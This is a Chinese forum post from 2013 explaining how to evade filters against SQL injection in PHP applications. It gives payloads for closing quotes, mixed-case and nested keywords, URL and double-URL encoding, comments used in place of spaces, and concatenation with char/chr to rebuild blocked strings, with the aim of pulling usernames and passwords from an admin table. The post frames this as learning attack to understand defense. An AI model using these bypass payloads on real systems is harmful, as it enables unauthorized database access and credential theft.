论坛
门户
内部优惠
喜欢
话题
VIP会员
搜索
新浪微博
登录
注册
100%
100%
首页
>
网络技术
>
网站安全
>
PHP中SQL注入,绕开过滤,照样注入
回复
« 返回列表
灯火互联
管理员
注册日期
2011-07-27
发帖数
41778
QQ
火币
41290枚
粉丝
1086
关注
100
加关注
写私信
打招呼
阅读:
2697
回复:
0
PHP中SQL注入,绕开过滤,照样注入
楼主
#
更多
只看楼主
倒序阅读
发布于:2013-01-13 18:32
保存
100%
100%
[]
1
SQL注入。有攻有防。知道进攻。才懂得防守.
有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。
唱出会删除或者净化一些字符,或者阻止常用的sql关键词。
我们通常有以下几种技巧,去避开这些过滤。
1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。
A,如果注入一个数字数据字段,就不需要使用单引号。
B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。
比如, ?id=1′ 这里存在注入,过滤了注释符合,我们可以输入 ?id=1′ or ‘a’=’a
目的其实很简单,就是把后面的单引号给闭合掉。
C,在一个MSSQL注入中注入批量查询的时候,不必使用分号分隔符。
只要纠正所有批量查询的语法,无论你是否使用分号,查询的解析器依然能正确的去解释它们的。
2,避免使用简单确认
一些输入确认机制使用一个简单的黑名单,组织或删除任何出现在这个名单中的数据,比如防注入程序。
这一般要看这个机制是否做的足够的好了,黑名单是否足够能确保安全。如果只是简单的黑名单,那也有机会突破的。
A,如果select关键词被阻止或删除
我们可以输入:
SeLeCt 注意大小写
selselectect 还记得e
web
editor是怎么过滤
asp
的么?
%53%45%4c%45%43%54 URL编码
%2553%2545%254c%2545%2543%2554 对上面的每个%后加了一个25
3,使用SQL注释符
A,使用注释来冒充注入的数据中的空格。
select/*yesu*/username,password/*yesu*/from/*yesu*/admin
/*yesu*/来冒充空格
B,使用注释来避开某些注入的确认过滤。
SEL/*yesu*/ECT username,password fr/*yesu*/om admin
4,处理被阻止的字符串
比如,程序阻止了admin,因为怕攻击者注入admin表单中的数据。
我们可以这样
A,oracle
数据库
: ‘adm’||’in’
B,MSSQL数据库: ‘adm’+’in’
C,MYSQL数据库: concat (‘adm’,’in’)
D,oracle中如果单引号被阻止了,还可以用chr函数
sleect password from admin where username = char(97) || chr(100) || chr(109) || chr(105) || chr(110)
还有其他方法。正在收集中
喜欢
0
评分
0
最新喜欢:
淘宝天猫隐藏优惠券地址
回复
100%
发帖
回复
« 返回列表
普通帖
您需要登录后才可以回帖,
登录
或者
注册
100%
返回顶部
关闭
最新喜欢